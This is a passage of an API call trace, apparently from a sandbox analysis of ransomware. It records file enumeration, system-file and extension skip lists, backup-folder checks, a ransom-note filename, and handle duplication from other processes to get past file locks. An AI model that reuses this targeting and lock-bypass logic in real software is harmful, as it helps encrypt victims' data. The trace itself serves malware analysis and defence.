| out: hFindFile=0x154188) returned 1 [0160.704] _wcsicmp (_Str1="backup", _Str2="Uulx-x") returned -19 [0160.704] wcslen (_String="backup") returned 0x6 [0160.704] _wcsicmp (_Str1="bak", _Str2="Uulx-x") returned -19 [0160.704] wcslen (_String="bak") returned 0x3 [0160.704] _wcsicmp (_Str1="back", _Str2="Uulx-x") returned -19 [0160.704] wcslen (_String="back") returned 0x4 [0160.704] _wcsicmp (_Str1="archive", _Str2="Uulx-x") returned -20 [0160.704] wcslen (_String="archive") returned 0x7 [0160.704] _wcsicmp (_Str1="bckp", _Str2="Uulx-x") returned -19 [0160.704] wcslen (_String="bckp") returned 0x4 [0160.704] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0160.706] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0160.706] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.706] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0160.708] _wcsicmp (_Str1="backup", _Str2="Music") returned -11 [0160.708] wcslen (_String="backup") returned 0x6 [0160.708] _wcsicmp (_Str1="bak", _Str2="Music") returned -11 [0160.708] wcslen (_String="bak") returned 0x3 [0160.708] _wcsicmp (_Str1="back", _Str2="Music") returned -11 [0160.708] wcslen (_String="back") returned 0x4 [0160.708] _wcsicmp (_Str1="archive", _Str2="Music") returned -12 [0160.708] wcslen (_String="archive") returned 0x7 [0160.708] _wcsicmp (_Str1="bckp", _Str2="Music") returned -11 [0160.708] wcslen (_String="bckp") returned 0x4 [0160.708] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0160.708] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0160.708] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0160.708] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0160.708] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0160.708] _wcsicmp (_Str1="NTUSER.DAT", _Str2="README.c06622a1.TXT") returned -4 [0160.708] wcsstr (_Str="NTUSER.DAT", _SubStr="README") returned 0x0 [0160.708] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT") returned -13 [0160.708] wcslen (_String="autorun.inf") returned 0xb [0160.708] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT") returned -12 [0160.708] wcslen (_String="boot.ini") returned 0x8 [0160.708] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT") returned -12 [0160.708] wcslen (_String="bootfont.bin") returned 0xc [0160.708] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT") returned -12 [0160.708] wcslen (_String="bootsect.bak") returned 0xc [0160.708] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT") returned -10 [0160.709] wcslen (_String="desktop.ini") returned 0xb [0160.709] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT") returned -5 [0160.709] wcslen (_String="iconcache.db") returned 0xc [0160.709] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT") returned -9 [0160.709] wcslen (_String="ntldr") returned 0x5 [0160.709] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT") returned 0 [0160.709] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0160.709] _wcsicmp (_Str1="ntuser.dat.LOG1", _Str2="README.c06622a1.TXT") returned -4 [0160.709] wcsstr (_Str="ntuser.dat.LOG1", _SubStr="README") returned 0x0 [0160.709] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.dat.LOG1") returned -13 [0160.709] wcslen (_String="autorun.inf") returned 0xb [0160.709] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.dat.LOG1") returned -12 [0160.709] wcslen (_String="boot.ini") returned 0x8 [0160.709] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.dat.LOG1") returned -12 [0160.709] wcslen (_String="bootfont.bin") returned 0xc [0160.709] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.dat.LOG1") returned -12 [0160.709] wcslen (_String="bootsect.bak") returned 0xc [0160.709] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.dat.LOG1") returned -10 [0160.709] wcslen (_String="desktop.ini") returned 0xb [0160.709] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.dat.LOG1") returned -5 [0160.709] wcslen (_String="iconcache.db") returned 0xc [0160.709] _wcsicmp (_Str1="ntldr", _Str2="ntuser.dat.LOG1") returned -9 [0160.709] wcslen (_String="ntldr") returned 0x5 [0160.709] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.dat.LOG1") returned -46 [0160.709] wcslen (_String="ntuser.dat") returned 0xa [0160.709] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.dat.LOG1") returned -49 [0160.709] wcslen (_String="ntuser.dat.log") returned 0xe [0160.709] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.dat.LOG1") returned 5 [0160.709] wcslen (_String="ntuser.ini") returned 0xa [0160.709] _wcsicmp (_Str1="thumbs.db", _Str2="ntuser.dat.LOG1") returned 6 [0160.709] wcslen (_String="thumbs.db") returned 0x9 [0160.709] _wcsicmp (_Str1="386", _Str2="LOG1") returned -57 [0160.709] wcslen (_String="386") returned 0x3 [0160.709] _wcsicmp (_Str1="adv", _Str2="LOG1") returned -11 [0160.709] wcslen (_String="adv") returned 0x3 [0160.709] _wcsicmp (_Str1="ani", _Str2="LOG1") returned -11 [0160.710] wcslen (_String="ani") returned 0x3 [0160.710] _wcsicmp (_Str1="bat", _Str2="LOG1") returned -10 [0160.710] wcslen (_String="bat") returned 0x3 [0160.710] _wcsicmp (_Str1="bin", _Str2="LOG1") returned -10 [0160.710] wcslen (_String="bin") returned 0x3 [0160.710] _wcsicmp (_Str1="cab", _Str2="LOG1") returned -9 [0160.710] wcslen (_String="cab") returned 0x3 [0160.710] _wcsicmp (_Str1="cmd", _Str2="LOG1") returned -9 [0160.710] wcslen (_String="cmd") returned 0x3 [0160.710] _wcsicmp (_Str1="com", _Str2="LOG1") returned -9 [0160.710] wcslen (_String="com") returned 0x3 [0160.710] _wcsicmp (_Str1="cpl", _Str2="LOG1") returned -9 [0160.710] wcslen (_String="cpl") returned 0x3 [0160.710] _wcsicmp (_Str1="cur", _Str2="LOG1") returned -9 [0160.710] wcslen (_String="cur") returned 0x3 [0160.710] _wcsicmp (_Str1="deskthemepack", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="deskthemepack") returned 0xd [0160.710] _wcsicmp (_Str1="diagcab", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="diagcab") returned 0x7 [0160.710] _wcsicmp (_Str1="diagcfg", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="diagcfg") returned 0x7 [0160.710] _wcsicmp (_Str1="diagpkg", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="diagpkg") returned 0x7 [0160.710] _wcsicmp (_Str1="dll", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="dll") returned 0x3 [0160.710] _wcsicmp (_Str1="drv", _Str2="LOG1") returned -8 [0160.710] wcslen (_String="drv") returned 0x3 [0160.710] _wcsicmp (_Str1="exe", _Str2="LOG1") returned -7 [0160.710] wcslen (_String="exe") returned 0x3 [0160.710] _wcsicmp (_Str1="hlp", _Str2="LOG1") returned -4 [0160.710] wcslen (_String="hlp") returned 0x3 [0160.710] _wcsicmp (_Str1="icl", _Str2="LOG1") returned -3 [0160.710] wcslen (_String="icl") returned 0x3 [0160.710] _wcsicmp (_Str1="icns", _Str2="LOG1") returned -3 [0160.710] wcslen (_String="icns") returned 0x4 [0160.710] _wcsicmp (_Str1="ico", _Str2="LOG1") returned -3 [0160.710] wcslen (_String="ico") returned 0x3 [0160.711] _wcsicmp (_Str1="ics", _Str2="LOG1") returned -3 [0160.711] wcslen (_String="ics") returned 0x3 [0160.711] _wcsicmp (_Str1="idx", _Str2="LOG1") returned -3 [0160.711] wcslen (_String="idx") returned 0x3 [0160.711] _wcsicmp (_Str1="ldf", _Str2="LOG1") returned -11 [0160.711] wcslen (_String="ldf") returned 0x3 [0160.711] _wcsicmp (_Str1="lnk", _Str2="LOG1") returned -1 [0160.711] wcslen (_String="lnk") returned 0x3 [0160.711] _wcsicmp (_Str1="mod", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="mod") returned 0x3 [0160.711] _wcsicmp (_Str1="mpa", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="mpa") returned 0x3 [0160.711] _wcsicmp (_Str1="msc", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="msc") returned 0x3 [0160.711] _wcsicmp (_Str1="msp", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="msp") returned 0x3 [0160.711] _wcsicmp (_Str1="msstyles", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="msstyles") returned 0x8 [0160.711] _wcsicmp (_Str1="msu", _Str2="LOG1") returned 1 [0160.711] wcslen (_String="msu") returned 0x3 [0160.711] _wcsicmp (_Str1="nls", _Str2="LOG1") returned 2 [0160.711] wcslen (_String="nls") returned 0x3 [0160.711] _wcsicmp (_Str1="nomedia", _Str2="LOG1") returned 2 [0160.711] wcslen (_String="nomedia") returned 0x7 [0160.711] _wcsicmp (_Str1="ocx", _Str2="LOG1") returned 3 [0160.711] wcslen (_String="ocx") returned 0x3 [0160.711] _wcsicmp (_Str1="prf", _Str2="LOG1") returned 4 [0160.711] wcslen (_String="prf") returned 0x3 [0160.711] _wcsicmp (_Str1="ps1", _Str2="LOG1") returned 4 [0160.711] wcslen (_String="ps1") returned 0x3 [0160.711] _wcsicmp (_Str1="rom", _Str2="LOG1") returned 6 [0160.711] wcslen (_String="rom") returned 0x3 [0160.711] _wcsicmp (_Str1="rtp", _Str2="LOG1") returned 6 [0160.711] wcslen (_String="rtp") returned 0x3 [0160.711] _wcsicmp (_Str1="scr", _Str2="LOG1") returned 7 [0160.711] wcslen (_String="scr") returned 0x3 [0160.711] _wcsicmp (_Str1="shs", _Str2="LOG1") returned 7 [0160.711] wcslen (_String="shs") returned 0x3 [0160.712] _wcsicmp (_Str1="spl", _Str2="LOG1") returned 7 [0160.712] wcslen (_String="spl") returned 0x3 [0160.712] _wcsicmp (_Str1="sys", _Str2="LOG1") returned 7 [0160.712] wcslen (_String="sys") returned 0x3 [0160.712] _wcsicmp (_Str1="theme", _Str2="LOG1") returned 8 [0160.712] wcslen (_String="theme") returned 0x5 [0160.712] _wcsicmp (_Str1="themepack", _Str2="LOG1") returned 8 [0160.712] wcslen (_String="themepack") returned 0x9 [0160.712] _wcsicmp (_Str1="wpx", _Str2="LOG1") returned 11 [0160.712] wcslen (_String="wpx") returned 0x3 [0160.712] _wcsicmp (_Str1="lock", _Str2="LOG1") returned -4 [0160.712] wcslen (_String="lock") returned 0x4 [0160.712] _wcsicmp (_Str1="key", _Str2="LOG1") returned -1 [0160.712] wcslen (_String="key") returned 0x3 [0160.712] _wcsicmp (_Str1="hta", _Str2="LOG1") returned -4 [0160.712] wcslen (_String="hta") returned 0x3 [0160.712] _wcsicmp (_Str1="msi", _Str2="LOG1") returned 1 [0160.712] wcslen (_String="msi") returned 0x3 [0160.712] _wcsicmp (_Str1="pdb", _Str2="LOG1") returned 4 [0160.712] wcslen (_String="pdb") returned 0x3 [0160.712] _wcsicmp (_Str1="sqlite", _Str2="LOG1") returned 7 [0160.712] wcslen (_String="sqlite") returned 0x6 [0160.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0160.712] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0160.712] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0160.712] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0160.712] wcscpy (in: _Dest=0x1f8e5c, _Source="ntuser.dat.LOG1" | out: _Dest="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0160.712] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1 [0160.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.713] GetCurrentProcessId () returned 0xb58 [0160.713] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0160.713] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x1e3008 [0160.713] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x1e3008, Length=0x400, ResultLength=0x32ee30 | out: SystemInformation=0x1e3008, ResultLength=0x32ee30*=0x276b4) returned 0xc0000004 [0160.715] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x1e3008, Size=0x276b4) returned 0x3210048 [0160.716] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x276b4, ResultLength=0x32ee30 | out: SystemInformation=0x3210048, ResultLength=0x32ee30*=0x276b4) returned 0x0 [0160.733] GetCurrentProcessId () returned 0xb58 [0160.733] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0160.733] CloseHandle (hObject=0x1b0) returned 1 [0160.733] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x1e3008 [0160.733] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x1e3008, Length=0x400, ResultLength=0x32ee70 | out: SystemInformation=0x1e3008, ResultLength=0x32ee70*=0x276a4) returned 0xc0000004 [0160.734] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x1e3008, Size=0x276a4) returned 0x3210048 [0160.734] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x276a4, ResultLength=0x32ee70 | out: SystemInformation=0x3210048, ResultLength=0x32ee70*=0x27634) returned 0x0 [0160.779] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x10000) returned 0x208e20 [0160.779] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.779] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.780] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.782] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.782] CloseHandle (hObject=0x1e4) returned 1 [0160.782] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0160.782] CloseHandle (hObject=0x194) returned 1 [0160.782] CloseHandle (hObject=0x1e8) returned 1 [0160.783] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.783] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.783] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.783] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.784] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.784] CloseHandle (hObject=0x1e4) returned 1 [0160.784] CloseHandle (hObject=0x194) returned 1 [0160.785] CloseHandle (hObject=0x1e8) returned 1 [0160.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.785] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.785] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.786] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.786] CloseHandle (hObject=0x1e4) returned 1 [0160.786] CloseHandle (hObject=0x194) returned 1 [0160.787] CloseHandle (hObject=0x1e8) returned 1 [0160.787] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.787] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.787] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.788] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.788] CloseHandle (hObject=0x1e4) returned 1 [0160.788] CloseHandle (hObject=0x194) returned 1 [0160.788] CloseHandle (hObject=0x1e8) returned 1 [0160.789] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.789] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.789] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.790] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.790] CloseHandle (hObject=0x1e4) returned 1 [0160.790] CloseHandle (hObject=0x194) returned 1 [0160.790] CloseHandle (hObject=0x1e8) returned 1 [0160.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.790] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.791] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.791] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.792] CloseHandle (hObject=0x1e4) returned 1 [0160.792] CloseHandle (hObject=0x194) returned 1 [0160.792] CloseHandle (hObject=0x1e8) returned 1 [0160.792] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.792] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.793] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.793] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.793] CloseHandle (hObject=0x1e4) returned 1 [0160.793] CloseHandle (hObject=0x194) returned 1 [0160.794] CloseHandle (hObject=0x1e8) returned 1 [0160.794] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.794] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.794] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.795] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.795] CloseHandle (hObject=0x1e4) returned 1 [0160.795] CloseHandle (hObject=0x194) returned 1 [0160.795] CloseHandle (hObject=0x1e8) returned 1 [0160.795] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0160.795] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.796] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.797] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.797] CloseHandle (hObject=0x1e4) returned 1 [0160.797] CloseHandle (hObject=0x194) returned 1 [0160.797] CloseHandle (hObject=0x1e8) returned 1 [0160.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0160.797] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.798] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.799] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.799] CloseHandle (hObject=0x1e4) returned 1 [0160.799] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.799] CloseHandle (hObject=0x194) returned 1 [0160.799] CloseHandle (hObject=0x1e8) returned 1 [0160.799] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0160.799] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.800] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.801] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.801] CloseHandle (hObject=0x1e4) returned 1 [0160.801] CloseHandle (hObject=0x194) returned 1 [0160.801] CloseHandle (hObject=0x1e8) returned 1 [0160.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0160.801] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.801] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 